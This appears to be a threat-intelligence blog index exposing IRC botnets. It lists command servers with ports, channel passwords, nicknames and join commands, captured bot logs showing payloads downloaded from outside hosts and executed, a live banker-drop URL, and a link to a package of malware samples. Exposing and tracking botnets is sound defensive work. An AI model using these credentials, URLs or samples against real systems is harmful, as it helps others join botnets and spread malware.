The method here is this: the spanish or brasilian hecker uses java aplet to download and execute his banker into remote computers the malicious url file is this: http://pics24.fileave.com/ to find out how the banker is downloaded and excuted u have to download the index.html file via wget for windows http://users.ugent.be/~bpuype/wget/#usage after downloading the index.htmlRead more...
75.102.22.40(irc botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number 204.0.5.51 80 216.178.38.224 80 216.178.39.11 80 66.220.149.11 80 75.102.22.40 2866 PASS xxx(irc comunication) NICK NEW-[USA|00|P|74212] USER XP-9076 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|74212] -ix JOIN #!nine! test PONG 22 MOTD hosting info: http://whois.domaintools.com/75.102.22.40
dl.ka3ek.com(irc botnet hosted in China Beijing Chinanet Jiangxi Province Network)
Remote Host Port Number dl.ka3ek.com 3321 PASS eee Resolved : [dl.ka3ek.com] To [59.53.91.167] Resolved : [dl.ka3ek.com] To [60.190.218.104] PASS eee KCIK qkrcdlij rssr pjvknyue “” “vxs” :pjvknyue PRIVMSG #dpi :Done. hosting infos: http://whois.domaintools.com/59.53.91.167
208.98.26.140(irc botnet hosted in United States Morgantown Sharktech Internet Services)
Remote Host Port Number 208.98.26.140 3211 PASS google_cache2.tmp NICK n[DvLz-USA|XP]757134 USER 7571 “” “TsGh” :7571 PONG :2ECEF3B6 JOIN #DvLz DvLz# PONG :Irc.D3v1Lz.Com hosting infos: http://whois.domaintools.com/208.98.26.140
46.21.169.42(irc botnet hosted in Netherlands Amsterdam Denkers Ict – Ipv4 Infrastructure)
Remote Host Port Number 46.21.169.42 6567 PASS s1m0n3t4 70.38.98.239 80 * The data identified by the following URL was then requested from the remote web server: o http://img105.herosh.com/2011/05/13/348778130.gif MODE [SI|USA|00|P|75060] -ix JOIN #mot# c1rc0dusoleil PRIVMSG #mot# :[Dl]: File download: 80.0KB to: c:WINDOWSjds.exe @ 80.0KB/sec. PRIVMSG #mot# :[Dl]: Created process: “c:WINDOWSjds.exe”, PID: PONG Apple.Network NICK [SI|USA|00|P|75060]Read more...
mecanto571.dyndns.org(irc botnet hosted in Germany Hetzner Online Ag)
Resolved : [mecanto571.dyndns.org] To [178.63.252.56] Remote Host Port Number 178.63.252.56 26745 PASS google_cache2.tmp or PASS serverpass 64.186.152.219 26745 PASS google_cache2.tmp or PASS serverpass 64.62.181.43 80 Invisible Users: 1417 Channels: 1 channels formed Clients:I have 1418 clients and 0 servers Local users: Current Local Users: 1418 Max: 4139 Global users: Current Global Users: 1418 Max: 1677Read more...
New Domain Name For The Blog
Hi everyone From today’s blog will have a new address this one www.exposedbotnets.com The name is closer to the content Have fun and see you later
28mb malware samples
Here another package have fun searching inside for bankers.rats.irc bots etc Download: http://a3059876.goneviral.com
184.22.249.48(irc botnet hosted in United States Scranton Network Operations Center Inc)
Remote Host Port Number 184.22.249.48 5992 PASS none NICK [3316|USA|XP|Z3R0x] USER 3316 “” “lol” :3316 JOIN #unauthorized none UPDATE: Remote Host Port Number 184.22.249.48 888 PASS none NICK n-055786 USER pzqbzki 0 0 :n-055786 JOIN #slinky jack123 USERHOST n-055786 MODE n-055786 -x+B infos about hosting: http://whois.domaintools.com/184.22.249.48
46.166.131.252(irc botnet hosted in Luxembourg Santrex Internet Services)
Remote Host Port Number 213.251.170.52 80 46.166.131.252 4723 PASS ngrBot NICK n{US|XPa}uysbxut USER uysbxut 0 0 :uysbxut JOIN #ngrBot Access infos about hosting: http://whois.domaintools.com/46.166.131.252